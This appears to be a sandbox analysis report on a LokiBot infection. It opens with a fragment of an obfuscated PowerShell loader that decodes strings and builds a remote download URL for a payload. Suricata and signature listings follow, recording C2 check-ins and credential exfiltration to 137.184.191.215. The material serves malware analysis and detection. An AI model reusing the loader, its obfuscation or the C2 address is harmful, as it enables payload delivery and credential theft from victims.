KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHand

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:40.197533+020020243121A Network Trojan was detected192.168.2.449740137.184.191.21580TCP
                2024-09-30T10:03:43.206738+020020243121A Network Trojan was detected192.168.2.449741137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:37.762735+020020253811Malware Command and Control Activity Detected192.168.2.449740137.184.191.21580TCP
                2024-09-30T10:03:40.295445+020020253811Malware Command and Control Activity Detected192.168.2.449741137.184.191.21580TCP
                2024-09-30T10:03:43.419899+020020253811Malware Command and Control Activity Detected192.168.2.449743137.184.191.21580TCP
                2024-09-30T10:03:46.121629+020020253811Malware Command and Control Activity Detected192.168.2.449744137.184.191.21580TCP
                2024-09-30T10:03:48.902903+020020253811Malware Command and Control Activity Detected192.168.2.449745137.184.191.21580TCP
                2024-09-30T10:03:51.764344+020020253811Malware Command and Control Activity Detected192.168.2.449746137.184.191.21580TCP
                2024-09-30T10:03:54.406913+020020253811Malware Command and Control Activity Detected192.168.2.449747137.184.191.21580TCP
                2024-09-30T10:03:57.375312+020020253811Malware Command and Control Activity Detected192.168.2.449748137.184.191.21580TCP
                2024-09-30T10:04:00.190479+020020253811Malware Command and Control Activity Detected192.168.2.449749137.184.191.21580TCP
                2024-09-30T10:04:02.933069+020020253811Malware Command and Control Activity Detected192.168.2.449750137.184.191.21580TCP
                2024-09-30T10:04:05.678113+020020253811Malware Command and Control Activity Detected192.168.2.449751137.184.191.21580TCP
                2024-09-30T10:04:08.387339+020020253811Malware Command and Control Activity Detected192.168.2.449752137.184.191.21580TCP
                2024-09-30T10:04:11.081114+020020253811Malware Command and Control Activity Detected192.168.2.449753137.184.191.21580TCP
                2024-09-30T10:04:13.777859+020020253811Malware Command and Control Activity Detected192.168.2.449754137.184.191.21580TCP
                2024-09-30T10:04:16.465295+020020253811Malware Command and Control Activity Detected192.168.2.449755137.184.191.21580TCP
                2024-09-30T10:04:19.199611+020020253811Malware Command and Control Activity Detected192.168.2.449756137.184.191.21580TCP
                2024-09-30T10:04:22.028391+020020253811Malware Command and Control Activity Detected192.168.2.449757137.184.191.21580TCP
                2024-09-30T10:04:24.890573+020020253811Malware Command and Control Activity Detected192.168.2.449758137.184.191.21580TCP
                2024-09-30T10:04:27.779108+020020253811Malware Command and Control Activity Detected192.168.2.449759137.184.191.21580TCP
                2024-09-30T10:04:30.577567+020020253811Malware Command and Control Activity Detected192.168.2.449760137.184.191.21580TCP
                2024-09-30T10:04:33.404478+020020253811Malware Command and Control Activity Detected192.168.2.449761137.184.191.21580TCP
                2024-09-30T10:04:36.560030+020020253811Malware Command and Control Activity Detected192.168.2.449762137.184.191.21580TCP
                2024-09-30T10:04:39.362494+020020253811Malware Command and Control Activity Detected192.168.2.449763137.184.191.21580TCP
                2024-09-30T10:04:42.109431+020020253811Malware Command and Control Activity Detected192.168.2.449764137.184.191.21580TCP
                2024-09-30T10:04:44.921692+020020253811Malware Command and Control Activity Detected192.168.2.449765137.184.191.21580TCP
                2024-09-30T10:04:47.749966+020020253811Malware Command and Control Activity Detected192.168.2.449766137.184.191.21580TCP
                2024-09-30T10:04:50.551239+020020253811Malware Command and Control Activity Detected192.168.2.449767137.184.191.21580TCP
                2024-09-30T10:04:53.321681+020020253811Malware Command and Control Activity Detected192.168.2.449768137.184.191.21580TCP
                2024-09-30T10:04:56.119034+020020253811Malware Command and Control Activity Detected192.168.2.449769137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:45.962176+020020243131Malware Command and Control Activity Detected192.168.2.449743137.184.191.21580TCP
                2024-09-30T10:03:48.746381+020020243131Malware Command and Control Activity Detected192.168.2.449744137.184.191.21580TCP
                2024-09-30T10:03:51.612879+020020243131Malware Command and Control Activity Detected192.168.2.449745137.184.191.21580TCP
                2024-09-30T10:03:54.245787+020020243131Malware Command and Control Activity Detected192.168.2.449746137.184.191.21580TCP
                2024-09-30T10:03:57.201550+020020243131Malware Command and Control Activity Detected192.168.2.449747137.184.191.21580TCP
                2024-09-30T10:04:00.028599+020020243131Malware Command and Control Activity Detected192.168.2.449748137.184.191.21580TCP
                2024-09-30T10:04:02.782457+020020243131Malware Command and Control Activity Detected192.168.2.449749137.184.191.21580TCP
                2024-09-30T10:04:05.519273+020020243131Malware Command and Control Activity Detected192.168.2.449750137.184.191.21580TCP
                2024-09-30T10:04:08.226409+020020243131Malware Command and Control Activity Detected192.168.2.449751137.184.191.21580TCP
                2024-09-30T10:04:10.928110+020020243131Malware Command and Control Activity Detected192.168.2.449752137.184.191.21580TCP
                2024-09-30T10:04:13.630115+020020243131Malware Command and Control Activity Detected192.168.2.449753137.184.191.21580TCP
                2024-09-30T10:04:16.314538+020020243131Malware Command and Control Activity Detected192.168.2.449754137.184.191.21580TCP
                2024-09-30T10:04:19.040370+020020243131Malware Command and Control Activity Detected192.168.2.449755137.184.191.21580TCP
                2024-09-30T10:04:21.852698+020020243131Malware Command and Control Activity Detected192.168.2.449756137.184.191.21580TCP
                2024-09-30T10:04:24.554059+020020243131Malware Command and Control Activity Detected192.168.2.449757137.184.191.21580TCP
                2024-09-30T10:04:27.506984+020020243131Malware Command and Control Activity Detected192.168.2.449758137.184.191.21580TCP
                2024-09-30T10:04:30.424231+020020243131Malware Command and Control Activity Detected192.168.2.449759137.184.191.21580TCP
                2024-09-30T10:04:33.235380+020020243131Malware Command and Control Activity Detected192.168.2.449760137.184.191.21580TCP
                2024-09-30T10:04:36.025873+020020243131Malware Command and Control Activity Detected192.168.2.449761137.184.191.21580TCP
                2024-09-30T10:04:39.113166+020020243131Malware Command and Control Activity Detected192.168.2.449762137.184.191.21580TCP
                2024-09-30T10:04:41.940599+020020243131Malware Command and Control Activity Detected192.168.2.449763137.184.191.21580TCP
                2024-09-30T10:04:44.760076+020020243131Malware Command and Control Activity Detected192.168.2.449764137.184.191.21580TCP
                2024-09-30T10:04:47.588537+020020243131Malware Command and Control Activity Detected192.168.2.449765137.184.191.21580TCP
                2024-09-30T10:04:50.392059+020020243131Malware Command and Control Activity Detected192.168.2.449766137.184.191.21580TCP
                2024-09-30T10:04:53.167318+020020243131Malware Command and Control Activity Detected192.168.2.449767137.184.191.21580TCP
                2024-09-30T10:04:55.967251+020020243131Malware Command and Control Activity Detected192.168.2.449768137.184.191.21580TCP
                2024-09-30T10:04:58.722041+020020243131Malware Command and Control Activity Detected192.168.2.449769137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:45.962176+020020243181Malware Command and Control Activity Detected192.168.2.449743137.184.191.21580TCP
                2024-09-30T10:03:48.746381+020020243181Malware Command and Control Activity Detected192.168.2.449744137.184.191.21580TCP
                2024-09-30T10:03:51.612879+020020243181Malware Command and Control Activity Detected192.168.2.449745137.184.191.21580TCP
                2024-09-30T10:03:54.245787+020020243181Malware Command and Control Activity Detected192.168.2.449746137.184.191.21580TCP
                2024-09-30T10:03:57.201550+020020243181Malware Command and Control Activity Detected192.168.2.449747137.184.191.21580TCP
                2024-09-30T10:04:00.028599+020020243181Malware Command and Control Activity Detected192.168.2.449748137.184.191.21580TCP
                2024-09-30T10:04:02.782457+020020243181Malware Command and Control Activity Detected192.168.2.449749137.184.191.21580TCP
                2024-09-30T10:04:05.519273+020020243181Malware Command and Control Activity Detected192.168.2.449750137.184.191.21580TCP
                2024-09-30T10:04:08.226409+020020243181Malware Command and Control Activity Detected192.168.2.449751137.184.191.21580TCP
                2024-09-30T10:04:10.928110+020020243181Malware Command and Control Activity Detected192.168.2.449752137.184.191.21580TCP
                2024-09-30T10:04:13.630115+020020243181Malware Command and Control Activity Detected192.168.2.449753137.184.191.21580TCP
                2024-09-30T10:04:16.314538+020020243181Malware Command and Control Activity Detected192.168.2.449754137.184.191.21580TCP
                2024-09-30T10:04:19.040370+020020243181Malware Command and Control Activity Detected192.168.2.449755137.184.191.21580TCP
                2024-09-30T10:04:21.852698+020020243181Malware Command and Control Activity Detected192.168.2.449756137.184.191.21580TCP
                2024-09-30T10:04:24.554059+020020243181Malware Command and Control Activity Detected192.168.2.449757137.184.191.21580TCP
                2024-09-30T10:04:27.506984+020020243181Malware Command and Control Activity Detected192.168.2.449758137.184.191.21580TCP
                2024-09-30T10:04:30.424231+020020243181Malware Command and Control Activity Detected192.168.2.449759137.184.191.21580TCP
                2024-09-30T10:04:33.235380+020020243181Malware Command and Control Activity Detected192.168.2.449760137.184.191.21580TCP
                2024-09-30T10:04:36.025873+020020243181Malware Command and Control Activity Detected192.168.2.449761137.184.191.21580TCP
                2024-09-30T10:04:39.113166+020020243181Malware Command and Control Activity Detected192.168.2.449762137.184.191.21580TCP
                2024-09-30T10:04:41.940599+020020243181Malware Command and Control Activity Detected192.168.2.449763137.184.191.21580TCP
                2024-09-30T10:04:44.760076+020020243181Malware Command and Control Activity Detected192.168.2.449764137.184.191.21580TCP
                2024-09-30T10:04:47.588537+020020243181Malware Command and Control Activity Detected192.168.2.449765137.184.191.21580TCP
                2024-09-30T10:04:50.392059+020020243181Malware Command and Control Activity Detected192.168.2.449766137.184.191.21580TCP
                2024-09-30T10:04:53.167318+020020243181Malware Command and Control Activity Detected192.168.2.449767137.184.191.21580TCP
                2024-09-30T10:04:55.967251+020020243181Malware Command and Control Activity Detected192.168.2.449768137.184.191.21580TCP
                2024-09-30T10:04:58.722041+020020243181Malware Command and Control Activity Detected192.168.2.449769137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:37.762735+020020216411A Network Trojan was detected192.168.2.449740137.184.191.21580TCP
                2024-09-30T10:03:40.295445+020020216411A Network Trojan was detected192.168.2.449741137.184.191.21580TCP
                2024-09-30T10:03:43.419899+020020216411A Network Trojan was detected192.168.2.449743137.184.191.21580TCP
                2024-09-30T10:03:46.121629+020020216411A Network Trojan was detected192.168.2.449744137.184.191.21580TCP
                2024-09-30T10:03:48.902903+020020216411A Network Trojan was detected192.168.2.449745137.184.191.21580TCP
                2024-09-30T10:03:51.764344+020020216411A Network Trojan was detected192.168.2.449746137.184.191.21580TCP
                2024-09-30T10:03:54.406913+020020216411A Network Trojan was detected192.168.2.449747137.184.191.21580TCP
                2024-09-30T10:03:57.375312+020020216411A Network Trojan was detected192.168.2.449748137.184.191.21580TCP
                2024-09-30T10:04:00.190479+020020216411A Network Trojan was detected192.168.2.449749137.184.191.21580TCP
                2024-09-30T10:04:02.933069+020020216411A Network Trojan was detected192.168.2.449750137.184.191.21580TCP
                2024-09-30T10:04:05.678113+020020216411A Network Trojan was detected192.168.2.449751137.184.191.21580TCP
                2024-09-30T10:04:08.387339+020020216411A Network Trojan was detected192.168.2.449752137.184.191.21580TCP
                2024-09-30T10:04:11.081114+020020216411A Network Trojan was detected192.168.2.449753137.184.191.21580TCP
                2024-09-30T10:04:13.777859+020020216411A Network Trojan was detected192.168.2.449754137.184.191.21580TCP
                2024-09-30T10:04:16.465295+020020216411A Network Trojan was detected192.168.2.449755137.184.191.21580TCP
                2024-09-30T10:04:19.199611+020020216411A Network Trojan was detected192.168.2.449756137.184.191.21580TCP
                2024-09-30T10:04:22.028391+020020216411A Network Trojan was detected192.168.2.449757137.184.191.21580TCP
                2024-09-30T10:04:24.890573+020020216411A Network Trojan was detected192.168.2.449758137.184.191.21580TCP
                2024-09-30T10:04:27.779108+020020216411A Network Trojan was detected192.168.2.449759137.184.191.21580TCP
                2024-09-30T10:04:30.577567+020020216411A Network Trojan was detected192.168.2.449760137.184.191.21580TCP
                2024-09-30T10:04:33.404478+020020216411A Network Trojan was detected192.168.2.449761137.184.191.21580TCP
                2024-09-30T10:04:36.560030+020020216411A Network Trojan was detected192.168.2.449762137.184.191.21580TCP
                2024-09-30T10:04:39.362494+020020216411A Network Trojan was detected192.168.2.449763137.184.191.21580TCP
                2024-09-30T10:04:42.109431+020020216411A Network Trojan was detected192.168.2.449764137.184.191.21580TCP
                2024-09-30T10:04:44.921692+020020216411A Network Trojan was detected192.168.2.449765137.184.191.21580TCP
                2024-09-30T10:04:47.749966+020020216411A Network Trojan was detected192.168.2.449766137.184.191.21580TCP
                2024-09-30T10:04:50.551239+020020216411A Network Trojan was detected192.168.2.449767137.184.191.21580TCP
                2024-09-30T10:04:53.321681+020020216411A Network Trojan was detected192.168.2.449768137.184.191.21580TCP
                2024-09-30T10:04:56.119034+020020216411A Network Trojan was detected192.168.2.449769137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T10:03:32.883154+020028032702Potentially Bad Traffic192.168.2.449738142.250.185.206443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for domain / URL
                Source: http://137.184.191.215/index.php/039Virustotal: Detection: 13%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbIn.1 source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb] source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2681410204.000000000320A000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 137.184.191.215:80
